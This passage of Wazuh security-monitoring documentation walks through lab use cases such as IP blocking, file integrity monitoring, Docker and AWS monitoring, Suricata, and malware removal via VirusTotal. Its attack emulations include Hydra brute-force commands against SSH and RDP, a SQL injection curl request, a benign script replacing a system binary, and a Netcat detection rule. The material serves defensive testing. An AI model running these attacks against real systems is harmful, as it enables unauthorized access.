  4. Navigate to the C:\Apache24\bin\ folder and run the following command in a PowerShell terminal with administrator privileges:

    > .\httpd.exe
    

    The first time you run the Apache binary, a Windows Defender Firewall prompt pops up.

  5. Click on Allow Access. This allows the Apache HTTP server to communicate on your private or public networks, depending on your network settings. It creates an inbound rule in your firewall to allow incoming traffic on port 80.

  6. Open http://<WINDOWS_IP> in a browser to view the Apache landing page and verify the installation. Also, verify that this URL can be reached from the attacker endpoint.

Configure the Wazuh agent

Perform the steps below to configure the Wazuh agent to monitor Apache web server logs.

  1. Add the following to C:\Program Files (x86)\ossec-agent\ossec.conf to configure the Wazuh agent and monitor the Apache access logs:

    <localfile>
      <log_format>syslog</log_format>
      <location>C:\Apache24\logs\access.log</location>
    </localfile>
    
  2. Restart the Wazuh agent in a PowerShell terminal with administrator privileges to apply the changes:

    > Restart-Service -Name wazuh
    
Wazuh server

You need to perform the following steps on the Wazuh server to add the IP address of the RHEL endpoint to a CDB list, and then configure rules and Active Response.

Download the utilities and configure the CDB list
  1. Install the wget utility to download the necessary artifacts using the command line interface:

    $ sudo yum update && sudo yum install -y wget
    
  2. Download the Alienvault IP reputation database:

    $ sudo wget https://iplists.firehol.org/files/alienvault_reputation.ipset -O /var/ossec/etc/lists/alienvault_reputation.ipset
    
  3. Append the IP address of the attacker endpoint to the IP reputation database. Replace <ATTACKER_IP> with the RHEL IP address in the command below:

    $ echo "<ATTACKER_IP>" | sudo tee -a /var/ossec/etc/lists/alienvault_reputation.ipset
    
  4. Download a script to convert from the .ipset format to the .cdb list format:

    $ sudo wget https://wazuh.com/resources/iplist-to-cdblist.py -O /tmp/iplist-to-cdblist.py
    
  5. Convert the alienvault_reputation.ipset file to a .cdb format using the previously downloaded script:

    $ sudo /var/ossec/framework/python/bin/python3 /tmp/iplist-to-cdblist.py /var/ossec/etc/lists/alienvault_reputation.ipset /var/ossec/etc/lists/blacklist-alienvault
    
  6. Optional: Remove the alienvault_reputation.ipset file and the iplist-to-cdblist.py script, as they are no longer needed:

    $ sudo rm -rf /var/ossec/etc/lists/alienvault_reputation.ipset
    $ sudo rm -rf /tmp/iplist-to-cdblist.py
    
  7. Assign the right permissions and ownership to the generated file:

    $ sudo chown wazuh:wazuh /var/ossec/etc/lists/blacklist-alienvault
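
After completing these steps, you can optionally verify that the generated file uses the CDB list format, which stores one key:value pair per line (here, an IP address followed by a colon and an empty value). The check below assumes the conversion script wrote the attacker address in that form:

    $ sudo grep "^<ATTACKER_IP>:" /var/ossec/etc/lists/blacklist-alienvault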
    
Configure the Active Response module to block the malicious IP address
  1. Add a custom rule to trigger a Wazuh active response script. Do this in the Wazuh server /var/ossec/etc/rules/local_rules.xml custom ruleset file:

    <group name="attack,">
      <rule id="100100" level="10">
        <if_group>web|attack|attacks</if_group>
        <list field="srcip" lookup="address_match_key">etc/lists/blacklist-alienvault</list>
        <description>IP address found in AlienVault reputation database.</description>
      </rule>
    </group>
    
  2. Edit the Wazuh server /var/ossec/etc/ossec.conf configuration file and add the etc/lists/blacklist-alienvault list to the <ruleset> section:

    <ossec_config>
      <ruleset>
        <!-- Default ruleset -->
        <decoder_dir>ruleset/decoders</decoder_dir>
        <rule_dir>ruleset/rules</rule_dir>
        <rule_exclude>0215-policy_rules.xml</rule_exclude>
        <list>etc/lists/audit-keys</list>
        <list>etc/lists/amazon/aws-eventnames</list>
        <list>etc/lists/security-eventchannel</list>
        <list>etc/lists/blacklist-alienvault</list>
    
        <!-- User-defined ruleset -->
        <decoder_dir>etc/decoders</decoder_dir>
        <rule_dir>etc/rules</rule_dir>
      </ruleset>
    
    </ossec_config>
    
  3. Add the Active Response block to the Wazuh server /var/ossec/etc/ossec.conf file:

    For the Ubuntu endpoint

    The firewall-drop command integrates with the Ubuntu local iptables firewall and drops incoming network connections from the attacker endpoint for 60 seconds:

    <ossec_config>
      <active-response>
        <disabled>no</disabled>
        <command>firewall-drop</command>
        <location>local</location>
        <rules_id>100100</rules_id>
        <timeout>60</timeout>
      </active-response>
    </ossec_config>
    

    For the Windows endpoint

    The active response script uses the netsh command to block the attacker's IP address on the Windows endpoint. The block lasts for 60 seconds:

    <ossec_config>
      <active-response>
        <disabled>no</disabled>
        <command>netsh</command>
        <location>local</location>
        <rules_id>100100</rules_id>
        <timeout>60</timeout>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Access any of the web servers from the RHEL endpoint using the corresponding IP address. Replace <WEBSERVER_IP> with the appropriate value and execute the following command from the attacker endpoint:

    $ curl http://<WEBSERVER_IP>
    

The attacker endpoint connects to the victim web servers successfully the first time. After the first connection, the Wazuh Active Response module temporarily blocks any subsequent connections to the web servers for 60 seconds.
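
To confirm that the block is in place, you can inspect the victim endpoint during the 60-second window. The sketch below is for the Ubuntu endpoint and assumes the default firewall-drop active response script, which inserts an iptables DROP rule for the offending source address:

    $ sudo iptables -L INPUT -n | grep "<ATTACKER_IP>"
    $ sudo tail /var/ossec/logs/active-responses.log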

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Ubuntu - rule.id:(651 OR 100100)

  • Windows - rule.id:(657 OR 100100)

File integrity monitoring

File Integrity Monitoring (FIM) helps in auditing sensitive files and meeting regulatory compliance requirements. Wazuh has an inbuilt FIM module that monitors file system changes to detect the creation, modification, and deletion of files.

This use case uses the Wazuh FIM module to detect changes in monitored directories on Ubuntu and Windows endpoints. The Wazuh FIM module enriches alert data by fetching information about the user and process that made the changes using who-data audit.

Infrastructure

  • Ubuntu 22.04: The Wazuh FIM module monitors a directory on this endpoint to detect file creation, changes, and deletion.

  • Windows 11: The Wazuh FIM module monitors a directory on this endpoint to detect file creation, changes, and deletion.

Configuration
Ubuntu endpoint

Perform the following steps to configure the Wazuh agent to monitor filesystem changes in the /root directory.

  1. Edit the Wazuh agent /var/ossec/etc/ossec.conf configuration file. Add the directories for monitoring within the <syscheck> block. For this use case, you configure Wazuh to monitor the /root directory. To get additional information about the user and process that made the changes, enable who-data audit:

    <directories check_all="yes" report_changes="yes" whodata="yes">/root</directories>
    

    Note

    You can also configure any path of your choice in the <directories> block.

  2. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Windows endpoint

Take the following steps to configure the Wazuh agent to monitor filesystem changes in the C:\Users\Administrator\Desktop directory.

  1. Edit the C:\Program Files (x86)\ossec-agent\ossec.conf configuration file on the monitored Windows endpoint. Add the directories for monitoring within the <syscheck> block. For this use case, you configure Wazuh to monitor the C:\Users\Administrator\Desktop directory. To get additional information about the user and process that made the changes, enable who-data audit:

    <directories check_all="yes" report_changes="yes" whodata="yes">C:\Users\<USER_NAME>\Desktop</directories>
    

    Note

    You can also configure any path of your choice in the <directories> block.

  2. Restart the Wazuh agent using PowerShell with administrator privileges to apply the changes:

    > Restart-Service -Name wazuh
    

As an alternative to local configurations on the Wazuh agents, you can centrally configure groups of agents.

Test the configuration
  1. Create a text file in the monitored directory, then wait for 5 seconds.

  2. Add content to the text file and save it. Wait for 5 seconds.

  3. Delete the text file from the monitored directory.
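
On the Ubuntu endpoint, the test above could look like the following sketch. The file name fim_test.txt is arbitrary:

    $ sudo touch /root/fim_test.txt && sleep 5
    $ echo "FIM test content" | sudo tee -a /root/fim_test.txt && sleep 5
    $ sudo rm /root/fim_test.txt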

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the File Integrity Monitoring module and add the filters in the search bar to query the alerts:

  • Ubuntu - rule.id: is one of 550,553,554

  • Windows - rule.id: is one of 550,553,554

Detecting a brute-force attack

Brute-forcing is a common attack vector that threat actors use to gain unauthorized access to endpoints and services. Services like SSH on Linux endpoints and RDP on Windows endpoints are usually prone to brute-force attacks. Wazuh identifies brute-force attacks by correlating multiple authentication failure events.

The section on Blocking attacks with Active Response describes how to configure an active response to block the IP address of an attacker. In this use case, we show how Wazuh detects brute-force attacks on RHEL and Windows endpoints.

Infrastructure

  • Ubuntu 22.04: Attacker endpoint that performs brute-force attacks. It’s required to have an SSH client installed on this endpoint.

  • RHEL 9.0: Victim endpoint of SSH brute-force attacks. It’s required to have an SSH server installed and enabled on this endpoint.

  • Windows 11: Victim endpoint of RDP brute-force attacks. It’s required to enable RDP on this endpoint.

Configuration

Perform the following steps to configure the Ubuntu endpoint. This allows you to perform authentication failure attempts against the monitored RHEL and Windows endpoints.

  1. On the attacker endpoint, install Hydra and use it to execute the brute-force attack:

    $ sudo apt update
    $ sudo apt install -y hydra
    
Attack emulation
  1. Create a text file with 10 random passwords. One way to generate such a file is sketched after this list.

  2. Run Hydra from the attacker endpoint to execute brute-force attacks against the RHEL endpoint. To do this, replace <RHEL_IP> with the IP address of the RHEL endpoint and run the command below:

    $ sudo hydra -l badguy -P <PASSWD_LIST.txt> <RHEL_IP> ssh
    
  3. Run Hydra from the attacker endpoint to execute brute-force attacks against the Windows endpoint. To do this, replace <WINDOWS_IP> with the IP address of the Windows endpoint and run the command below:

    $ sudo hydra -l badguy -P <PASSWD_LIST.txt> rdp://<WINDOWS_IP>
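
One way to generate the password list mentioned in step 1 is sketched below. The file name passwords.txt is arbitrary; pass it to Hydra in place of <PASSWD_LIST.txt>:

    $ for i in $(seq 1 10); do openssl rand -base64 12; done > passwords.txt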
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Linux - rule.id:(5551 OR 5712). Other related rules are 5710, 5711, 5716, 5720, 5503, 5504.

  • Windows - rule.id:(60122 OR 60204)

Monitoring Docker events

Docker automates the deployment of different applications inside software containers. The Wazuh module for Docker identifies security incidents across containers and alerts in real-time. In this use case, you configure Wazuh to monitor Docker events on an Ubuntu endpoint hosting Docker containers.

See the Monitoring container activity section of the documentation to learn more about monitoring Docker and the docker-listener module.

Infrastructure

  • Ubuntu 22.04: This is the Docker host where you create and delete containers.

Configuration

Perform the following steps to install Docker on the Ubuntu endpoint and configure Wazuh to monitor Docker events.

  1. Install Python and pip:

    $ sudo apt install python3 python3-pip
    
  2. Upgrade pip:

    $ sudo pip3 install --upgrade pip
    
  3. Install Docker and Python Docker Library:

    $ curl -sSL https://get.docker.com/ | sh
    $ sudo pip3 install docker==7.1.0 urllib3==1.26.20 requests==2.32.2
    
  4. Edit the Wazuh agent configuration file /var/ossec/etc/ossec.conf and add this block to enable the docker-listener module:

    <ossec_config>
      <wodle name="docker-listener">
        <interval>10m</interval>
        <attempts>5</attempts>
        <run_on_start>yes</run_on_start>
        <disabled>no</disabled>
      </wodle>
    </ossec_config>
    
  5. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Test the configuration

Perform several Docker activities like pulling a Docker image, starting an instance, running some other Docker commands, and then deleting the container.

  1. Pull an image, such as the NGINX image, and run a container:

    $ sudo docker pull nginx
    $ sudo docker run -d -P --name nginx_container nginx
    $ sudo docker exec -it nginx_container cat /etc/passwd
    $ sudo docker exec -it nginx_container /bin/bash
    $ exit
    
  2. Stop and remove the container:

    $ sudo docker stop nginx_container
    $ sudo docker rm nginx_container
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Docker module.

Troubleshooting
  • Error log:

    wazuh-modulesd:docker-listener: ERROR: /usr/bin/env: ‘python’: No such file or directory
    

    Location: Wazuh agent log - /var/ossec/logs/ossec.log

    Resolution: You can create a symbolic link to solve this:

    $ sudo ln -s /usr/bin/python3 /usr/bin/python
    

Monitoring AWS infrastructure

This use case shows how the Wazuh module for AWS (aws-s3) enables log data collection from different AWS sources.

To learn more about monitoring AWS resources, see the Using Wazuh to monitor AWS section of the documentation.

Infrastructure

  • Amazon CloudTrail: Amazon CloudTrail, like all other supported AWS services, requires setting the necessary policies for user permissions and providing a valid authentication method. In this PoC, we use the profile authentication method.

Configuration

Take the following steps to configure Wazuh to monitor Amazon CloudTrail services and identify security incidents.

CloudTrail
  1. Access the CloudTrail service using the AWS console.

  2. Create a new trail.

  3. Choose between creating a new S3 bucket or specifying an existing one to store CloudTrail logs. Note down the name of the S3 bucket, as you need to specify it in the Wazuh configuration.

The image below shows how to create a new CloudTrail service and attach a new S3 bucket.

Wazuh server
  1. Enable the Wazuh AWS module in the /var/ossec/etc/ossec.conf configuration file on the Wazuh server. Add only the AWS buckets of interest. Read our guide on how to Configure AWS credentials:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>30m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>no</skip_on_error>
    
      <bucket type="cloudtrail">
        <name><AWS_BUCKET_NAME></name>
        <aws_profile><AWS_PROFILE_NAME></aws_profile>
      </bucket>
    </wodle>
    
  2. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Test the configuration

Once you configure CloudTrail, you can generate events by simply creating a new IAM user account using the IAM service. This generates an event that Wazuh processes.
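
If you prefer the command line, and assuming the AWS CLI is installed and configured with credentials for the same account, creating and then deleting a throwaway IAM user produces equivalent CloudTrail events. The user name below is arbitrary:

    $ aws iam create-user --user-name wazuh-poc-test
    $ aws iam delete-user --user-name wazuh-poc-test

Keep in mind that CloudTrail delivers logs to the S3 bucket with some delay, and that the module polls the bucket at the 30-minute interval configured above.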

The Wazuh default ruleset parses AWS logs and generates alerts automatically. The alerts appear as soon as Wazuh receives the logs from the AWS S3 bucket.

You can also find additional CloudTrail use cases in our documentation.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, navigate to the Amazon Web Services module.

Detecting unauthorized processes

The Wazuh command monitoring capability runs commands on an endpoint and monitors the output of the commands.

In this use case, you use the Wazuh command monitoring capability to detect when Netcat is running on an Ubuntu endpoint. Netcat is a computer networking utility used for port scanning and port listening.

Infrastructure

  • Ubuntu 22.04: You configure the Wazuh command monitoring module on this endpoint to detect a running Netcat process.

Configuration
Ubuntu endpoint

Take the following steps to configure command monitoring and query a list of all running processes on the Ubuntu endpoint.

  1. Add the following configuration block to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows the Wazuh agent to periodically get a list of running processes:

    <ossec_config>
      <localfile>
        <log_format>full_command</log_format>
        <alias>process list</alias>
        <command>ps -e -o pid,uname,command</command>
        <frequency>30</frequency>
      </localfile>
    </ossec_config>
    
  2. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
  3. Install Netcat and the required dependencies:

    $ sudo apt install ncat nmap -y
    
Wazuh server

Perform the following steps on the Wazuh server to create rules that trigger every time the Netcat program launches.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server:

    <group name="ossec,">
      <rule id="100050" level="0">
        <if_sid>530</if_sid>
        <match>^ossec: output: 'process list'</match>
        <description>List of running processes.</description>
        <group>process_monitor,</group>
      </rule>
    
      <rule id="100051" level="7" ignore="900">
        <if_sid>100050</if_sid>
        <match>nc -l</match>
        <description>netcat listening for incoming connections.</description>
        <group>process_monitor,</group>
      </rule>
    </group>
    
  2. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation

On the monitored Ubuntu endpoint, run nc -l 8000 for at least 30 seconds so that the periodic process list scan captures the Netcat process.
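
A minimal way to do this from a shell on the Ubuntu endpoint is to start the listener in the background, keep it alive past at least one scan, and then stop it:

    $ nc -l 8000 &
    $ sleep 35
    $ kill $!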

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.id:(100051)

Network IDS integration

Wazuh integrates with a network-based intrusion detection system (NIDS) to enhance threat detection by monitoring and analyzing network traffic.

In this use case, we demonstrate how to integrate Suricata with Wazuh. Suricata can provide additional insights into your network's security with its network traffic inspection capabilities.

Infrastructure

  • Ubuntu 22.04: This is the endpoint where you install Suricata. In this use case, Wazuh monitors and analyzes the network traffic generated on this endpoint.

Configuration

Take the following steps to configure Suricata on the Ubuntu endpoint and send the generated logs to the Wazuh server.

  1. Install Suricata on the Ubuntu endpoint. We tested this process with version 6.0.8 and it can take some time:

    $ sudo add-apt-repository ppa:oisf/suricata-stable
    $ sudo apt-get update
    $ sudo apt-get install suricata -y
    
  2. Download and extract the Emerging Threats Suricata ruleset:

    $ cd /tmp/ && curl -LO https://rules.emergingthreats.net/open/suricata-6.0.8/emerging.rules.tar.gz
    $ sudo tar -xvzf emerging.rules.tar.gz && sudo mkdir /etc/suricata/rules && sudo mv rules/*.rules /etc/suricata/rules/
    $ sudo chmod 777 /etc/suricata/rules/*.rules
    
  3. Modify Suricata settings in the /etc/suricata/suricata.yaml file and set the following variables:

    HOME_NET: "<UBUNTU_IP>"
    EXTERNAL_NET: "any"
    
    default-rule-path: /etc/suricata/rules
    rule-files:
    - "*.rules"
    
    # Global stats configuration
    stats:
      enabled: yes
    
    # Linux high speed capture support
    af-packet:
      - interface: enp0s3
    

    interface represents the network interface you want to monitor. Replace the value with the interface name of the Ubuntu endpoint. For example, enp0s3.

    # ifconfig
    
    enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
            inet6 fe80::9ba2:9de3:57ad:64e5  prefixlen 64  scopeid 0x20<link>
            ether 08:00:27:14:65:bd  txqueuelen 1000  (Ethernet)
            RX packets 6704315  bytes 1268472541 (1.1 GiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 4590192  bytes 569730548 (543.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
  4. Restart the Suricata service:

    $ sudo systemctl restart suricata
    
  5. Add the following configuration to the /var/ossec/etc/ossec.conf file of the Wazuh agent. This allows the Wazuh agent to read the Suricata log file:

    <ossec_config>
      <localfile>
        <log_format>json</log_format>
        <location>/var/log/suricata/eve.json</location>
      </localfile>
    </ossec_config>
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation

Wazuh automatically parses data from /var/log/suricata/eve.json and generates related alerts on the Wazuh dashboard.

Ping the Ubuntu endpoint IP address from the Wazuh server:

$ ping -c 20 "<UBUNTU_IP>"
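
Before moving to the dashboard, you can confirm locally that Suricata wrote alert events to eve.json. The sketch below assumes jq is installed on the Ubuntu endpoint; the exact signature names depend on the Emerging Threats ruleset in use:

    $ sudo apt install -y jq
    $ sudo jq -r 'select(.event_type=="alert") | .alert.signature' /var/log/suricata/eve.json | sort | uniq -c
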
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:suricata

Troubleshooting
  • Error log:

    16/9/2022 -- 12:32:16 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Unable to find iface eth0: No such device
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Couldn't init AF_PACKET socket, fatal error
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_FATAL(171)] - thread W#01-eth0 failed
    

    Location: Suricata log - /var/log/suricata/suricata.log

    Resolution: To solve this issue, check the name of your network interface and configure it accordingly in the /etc/sysconfig/suricata and /etc/suricata/suricata.yaml files.

Detecting an SQL injection attack

You can use Wazuh to detect SQL injection attacks from web server logs that contain patterns like select, union, and other common SQL injection strings.

SQL injection is an attack in which a threat actor inserts malicious code into strings transmitted to a database server for parsing and execution. A successful SQL injection attack gives unauthorized access to confidential information contained in the database.

In this use case, you simulate an SQL injection attack against an Ubuntu endpoint and detect it with Wazuh.

Infrastructure

  • Ubuntu 22.04: Victim endpoint running an Apache 2.4.54 web server.

  • RHEL 9.0: Attacker endpoint that launches the SQL injection attack.

Configuration
Ubuntu endpoint

Perform the following steps to install Apache and configure the Wazuh agent to monitor the Apache logs.

  1. Update the local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If the firewall is enabled, modify it to allow external access to web ports. Skip this step if the firewall is disabled.

    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    $ sudo ufw status
    
  3. Check the status of the Apache service to verify that the web server is running:

    $ sudo systemctl status apache2
    
  4. Use the curl command or open http://<UBUNTU_IP> in a browser to view the Apache landing page and verify the installation:

    $ curl http://<UBUNTU_IP>
    
  5. Add the following lines to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows the Wazuh agent to monitor the access logs of your Apache server:

    <ossec_config>
      <localfile>
        <log_format>apache</log_format>
        <location>/var/log/apache2/access.log</location>
      </localfile>
    </ossec_config>
    
  6. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation

Replace <UBUNTU_IP> with the appropriate IP address and execute the following command from the attacker endpoint:

$ curl -XGET "http://<UBUNTU_IP>/users/?id=SELECT+*+FROM+users";

The expected result here is an alert with rule ID 31103. If the SQL injection attempt succeeds and the web server returns a success code, Wazuh generates an alert with rule ID 31106.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.id:31103

  • rule.id:31106

Detecting suspicious binaries

Wazuh has anomaly and malware detection capabilities that detect suspicious binaries on an endpoint. Binaries are executable files written to perform automated tasks. Malicious actors often abuse them to carry out exploitation while avoiding detection.

In this use case, we demonstrate how the Wazuh rootcheck module can detect a trojaned system binary on an Ubuntu endpoint. You perform the exploit by replacing a legitimate binary with malicious code, tricking the endpoint into running the malicious code as if it were the legitimate binary.

The Wazuh rootcheck module also checks for hidden processes, ports, and files.

Infrastructure

  • Ubuntu 22.04: The Wazuh rootcheck module detects the execution of a suspicious binary on this endpoint.

Configuration

Take the following steps on the Ubuntu endpoint to enable the Wazuh rootcheck module and perform anomaly and malware detection.

By default, the Wazuh rootcheck module is enabled in the Wazuh agent configuration file. Check the <rootcheck> block in the /var/ossec/etc/ossec.conf configuration file of the monitored endpoint and make sure that it has the configuration below:

<rootcheck>
    <disabled>no</disabled>

    <check_dev>yes</check_dev>
    <check_sys>yes</check_sys>
    <check_pids>yes</check_pids>
    <check_ports>yes</check_ports>
    <check_if>yes</check_if>

    <!-- Frequency that rootcheck is executed - every 12 hours -->
    <frequency>43200</frequency>
    <skip_nfs>yes</skip_nfs>
</rootcheck>

The rootcheck section explains the options in the rootcheck module.

Attack emulation
  1. Create a copy of the original system binary:

    $ sudo cp -p /usr/bin/w /usr/bin/w.copy
    
  2. Replace the original system binary /usr/bin/w with the following shell script:

    $ sudo tee /usr/bin/w << EOF
    #!/bin/bash
    echo "`date` this is evil" > /tmp/trojan_created_file
    echo 'test for /usr/bin/w trojaned file' >> /tmp/trojan_created_file
    #Now running original binary
    /usr/bin/w.copy
    EOF
    
  3. The rootcheck scan runs every 12 hours by default. Force a scan by restarting the Wazuh agent to see the relevant alert:

    $ sudo systemctl restart wazuh-agent
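
After you finish testing, you may want to undo the changes by restoring the original binary from the copy made in step 1 and removing the file created by the trojanized script:

    $ sudo mv /usr/bin/w.copy /usr/bin/w
    $ sudo rm -f /tmp/trojan_created_file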
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • location:rootcheck AND rule.id:510 AND data.title:Trojaned version of file detected.

  • Additionally, using the Filter by type search field, apply the full_log filter.

Detecting and removing malware using VirusTotal integration

Wazuh uses the integrator module to connect to external APIs and alerting tools such as VirusTotal.

In this use case, you use the Wazuh File Integrity Monitoring (FIM) module to monitor a directory for changes and the VirusTotal API to scan the files in the directory. Then, you configure Wazuh to trigger an active response script that removes files VirusTotal detects as malicious. We test this use case on Ubuntu and Windows endpoints.

You need a VirusTotal API key in this use case to authenticate Wazuh to the VirusTotal API.

For more information on this integration, check the VirusTotal integration section of the documentation.

Infrastructure

  • Ubuntu 22.04: This is the Linux endpoint where you download a malicious file. Wazuh triggers an active response script to remove the file once VirusTotal flags it as malicious.

  • Windows 11: This is the Windows endpoint where you download a malicious file. Wazuh triggers an active response script to remove the file once VirusTotal flags it as malicious.

Configuration for the Ubuntu endpoint

Configure your environment as follows to test the use case for the Ubuntu endpoint. These steps work for other Linux distributions as well.

Ubuntu endpoint

Perform the following steps to configure Wazuh to monitor near real-time changes in the /root directory of the Ubuntu endpoint. These steps also install the necessary packages and create the active response script that removes malicious files.

  1. Search for the <syscheck> block in the Wazuh agent configuration file /var/ossec/etc/ossec.conf. Make sure that <disabled> is set to no. This enables the Wazuh FIM to monitor for directory changes.

  2. Add an entry within the <syscheck> block to configure a directory to be monitored in near real-time. In this case, you are monitoring the /root directory:

    <directories realtime="yes">/root</directories>
    
  3. Install jq, the utility that the active response script uses to parse JSON input:

    $ sudo apt update
    $ sudo apt -y install jq
    
  4. Create the /var/ossec/active-response/bin/remove-threat.sh active response script to remove malicious files from the endpoint:

    #!/bin/bash
    
    LOCAL=`dirname $0`;
    cd $LOCAL
    cd ../
    
    PWD=`pwd`
    
    read INPUT_JSON
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.data.virustotal.source.file)
    COMMAND=$(echo $INPUT_JSON | jq -r .command)
    LOG_FILE="${PWD}/../logs/active-responses.log"
    
    #------------------------ Analyze command -------------------------#
    if [ ${COMMAND} = "add" ]
    then
     # Send control message to execd
     printf '{"version":1,"origin":{"name":"remove-threat","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'
    
     read RESPONSE
     COMMAND2=$(echo $RESPONSE | jq -r .command)
     if [ ${COMMAND2} != "continue" ]
     then
      echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Remove threat active response aborted" >> ${LOG_FILE}
      exit 0;
     fi
    fi
    
    # Removing file
    rm -f $FILENAME
    if [ $? -eq 0 ]; then
     echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Successfully removed threat" >> ${LOG_FILE}
    else
     echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Error removing threat" >> ${LOG_FILE}
    fi
    
    exit 0;
    
  5. Change the /var/ossec/active-response/bin/remove-threat.sh file ownership and permissions:

    $ sudo chmod 750 /var/ossec/active-response/bin/remove-threat.sh
    $ sudo chown root:wazuh /var/ossec/active-response/bin/remove-threat.sh
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps on the Wazuh server to alert for changes in the endpoint directory and enable the VirusTotal integration. These steps also enable and trigger the active response script whenever a suspicious file is detected.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server. These rules alert about changes in the /root directory that are detected by FIM scans:

    <group name="syscheck,pci_dss_11.5,nist_800_53_SI.7,">
        <!-- Rules for Linux systems -->
        <rule id="100200" level="7">
            <if_sid>550</if_sid>
            <field name="file">/root</field>
            <description>File modified in /root directory.</description>
        </rule>
        <rule id="100201" level="7">
            <if_sid>554</if_sid>
            <field name="file">/root</field>
            <description>File added to /root directory.</description>
        </rule>
    </group>
    
  2. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf file to enable the VirusTotal integration. Replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. This allows Wazuh to trigger a VirusTotal query whenever either of the rules 100200 and 100201 is triggered:

    <ossec_config>
      <integration>
        <name>virustotal</name>
        <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
        <rule_id>100200,100201</rule_id>
        <alert_format>json</alert_format>
      </integration>
    </ossec_config>
    

    Note

    The free VirusTotal API rate limits requests to four per minute. If you have a premium VirusTotal API key, with a high frequency of queries allowed, you can add more rules besides these two. You can also configure Wazuh to monitor more directories.

  3. Append the following blocks to the Wazuh server /var/ossec/etc/ossec.conf file. This enables Active Response and triggers the remove-threat.sh script when VirusTotal flags a file as malicious:

    <ossec_config>
      <command>
        <name>remove-threat</name>
        <executable>remove-threat.sh</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>remove-threat</command>
        <location>local</location>
        <rules_id>87105</rules_id>
      </active-response>
    </ossec_config>
    
  4. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file to alert about the Active Response results:

    <group name="virustotal,">
      <rule id="100092" level="12">
        <if_sid>657</if_sid>
        <match>Successfully removed threat</match>
        <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    
      <rule id="100093" level="12">
        <if_sid>657</if_sid>
        <match>Error removing threat</match>
        <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    </group>
    
  5. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Download an EICAR test file to the /root directory on the Ubuntu endpoint:

    $ sudo curl -Lo /root/eicar.com https://secure.eicar.org/eicar.com && sudo ls -lah /root/eicar.com
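
Once VirusTotal flags the file and the active response runs, the remove-threat.sh script deletes it and logs the result. You can verify this on the Ubuntu endpoint; note that the free VirusTotal API may take a short while to respond:

    $ sudo ls -lah /root/eicar.com
    $ sudo grep "Successfully removed threat" /var/ossec/logs/active-responses.log

The first command should report that the file no longer exists.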
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Linux - rule.id: is one of 553,100092,87105,100201

    Remove malware on Linux alert
Configuration for the Windows endpoint
Windows endpoint

Perform the following steps to configure Wazuh to monitor near real-time changes in the Downloads directory. These steps also install the necessary packages and create the active response script to remove malicious files.

